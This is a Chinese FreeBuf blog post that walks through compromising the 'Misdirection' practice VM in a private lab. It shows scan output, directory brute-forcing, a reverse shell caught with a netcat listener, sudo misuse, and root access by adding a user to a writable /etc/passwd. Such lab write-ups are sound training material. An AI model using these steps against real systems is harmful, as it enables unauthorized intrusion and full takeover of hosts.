freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Misdirection 打靶记录
Haituny 2023-11-17 18:23:47 122755

总体思路

image

nmap扫描

端口扫描

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy

开放端口及系统信息详细扫描

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ecbb44eef333af9fa5ceb5776145e436 (RSA)
|   256 677bcb4e951b78088d2ab147048d6287 (ECDSA)
|_  256 59041d25116d89a36c6de4e3d23cda7d (ED25519)
80/tcp   open  http    Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:4E:AF:88 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

简单脚本扫描

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.137.130:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Fsupport%27%20OR%20sqlspider
|     http://192.168.137.130:80/init/default/user/login?_next=%2Finit%2Fdefault%2Fsupport%27%20OR%20sqlspider
|_    http://192.168.137.130:80/init/default/user/register?_next=%2Finit%2Fdefault%2Fsupport%27%20OR%20sqlspider
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.137.130
|   Found the following possible CSRF vulnerabilities: 
|
|     Path: http://192.168.137.130:80/init/default/user/register?_next=/init/default/index
|     Form id: auth_user_first_name__row
|     Form action: #
|
|     Path: http://192.168.137.130:80/init/default/user/request_reset_password?_next=/init/default/index
|     Form id: auth_user_email__row
|_    Form action: #
| http-enum: 
|   /admin/: Possible admin folder
|_  /admin/admin/: Possible admin folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /debug/: Potentially interesting folder
|   /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
MAC Address: 00:0C:29:4E:AF:88 (VMware)

进行详细分析和渗透优先级排序

数据库时mysql,80是Rocket,不太熟悉。脚本扫描说可能存在SQL注入。8080是apache,好像有wordpress内容管理系统,知道了一些目录。
优先级排序:
mysql-->web-->ssh

mysql空密码尝试

# mysql -h 192.168.137.130 -u root -p
\Enter password: 
ERROR 1130 (HY000): Host '192.168.137.135' is not allowed to connect to this MySQL server

登陆失败

web渗透

80端口

刚刚得知是Rocket 1.2.6,进行exp利用寻找。找了searchsploit和exp-db。都没有找到可以利用的。

页面检索

图片.png
有登录,注册,密码忘记功能。
登录功能尝试了sql注入,无效。
注册尝试了二次注入,但是怎么样无法注册。

图片.png
站点貌似是web2py搭建。但是没找到具体版本号。找了一下利用,也没有合适的。

目录暴破

# gobuster dir -u 'http://192.168.137.130/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 50

/examples             (Status: 200) [Size: 6937]
/welcome              (Status: 200) [Size: 13705]
/admin                (Status: 200) [Size: 42]
/init                 (Status: 200) [Size: 5782]

/admin没有权限访问,/init就是主页面,/examples得知web2py的版本为2.18.5。
图片.png
但是searchsploit还是无利用。

/welcome是web2py的欢迎页面。有登录页面,注册页面和密码忘记页面。
图片.png
这次可以注册,但是什么都没有。

8080端口

只是一个apache的默认页。

目录暴破

# gobuster dir -u 'http://192.168.137.130:8080' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/images               (Status: 301) [Size: 326] [--> http://192.168.137.130:8080/images/]
/help                 (Status: 301) [Size: 324] [--> http://192.168.137.130:8080/help/]
/scripts              (Status: 301) [Size: 327] [--> http://192.168.137.130:8080/scripts/]
/css                  (Status: 301) [Size: 323] [--> http://192.168.137.130:8080/css/]
/wordpress            (Status: 301) [Size: 329] [--> http://192.168.137.130:8080/wordpress/]
/development          (Status: 301) [Size: 331] [--> http://192.168.137.130:8080/development/]
/manual               (Status: 301) [Size: 326] [--> http://192.168.137.130:8080/manual/]
/js                   (Status: 301) [Size: 322] [--> http://192.168.137.130:8080/js/]
/shell                (Status: 301) [Size: 325] [--> http://192.168.137.130:8080/shell/]
/debug                (Status: 301) [Size: 325] [--> http://192.168.137.130:8080/debug/]
/server-status        (Status: 403) [Size: 282]

逐一访问之后,发现/debug直接就是一个shell。
图片.png

getshell

那么反弹到我们的攻击机上吧。舒服一点。

# nc -lvnp 8081
listening on [any] 8081 ...
connect to [192.168.137.135] from (UNKNOWN) [192.168.137.130] 40888
bash: cannot set terminal process group (858): Inappropriate ioctl for device
bash: no job control in this shell
www-data@misdirection:/var/www/html/debug$

那么我们拿到了初始立足点。

提权

第一次提权

进行常规的提权遍历。sudo遍历,自动任务,suid文件,用户家目录...
sudo -l的时候,发现brexit用户可以无密码启用bash。

www-data@misdirection:/var/www/html/debug$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on localhost:
    (brexit) NOPASSWD: /bin/bash

那么可以执行sudo -u brexit /bin/bash提权到brexit用户。

www-data@misdirection:/var/www/html/debug$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
whoami
brexit

第二次提权

一样,进行窗轨的提权遍历。最后发现/etc/passwd竟然是可以编辑的。find / -group brexit -type f 2>/dev/null
图片.png
用mkpasswd生成密码写入/passwd。直接切换即可提权成功。

brexit@misdirection:/var/www/html/debug$ su zzk 
su zzk
Password: 123456

root@misdirection:/var/www/html/debug# whoami
whoami
root
root@misdirection:/var/www/html/debug#

靶机总结与认知成长

  1. 每一个步骤尽量做的完整一些再进行下一步。

  2. sudo的时候,-u可以指定特定用户名。

  3. 提权遍历的时候,不要忘了查看/etc/passwd和/etc/shadow文件的权限。

# 渗透测试
本文为 Haituny 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
OSCP LIKE
Haituny LV.5
这家伙太懒了,还未填写个人描述!
  • 23 文章数
  • 15 关注者
流量分析及流量特征识别总结
2024-01-18
VPN和路由器的安全加固
2024-01-16
安全加固--详细清单(含系统,中间件,数据库加固)
2024-01-07
文章目录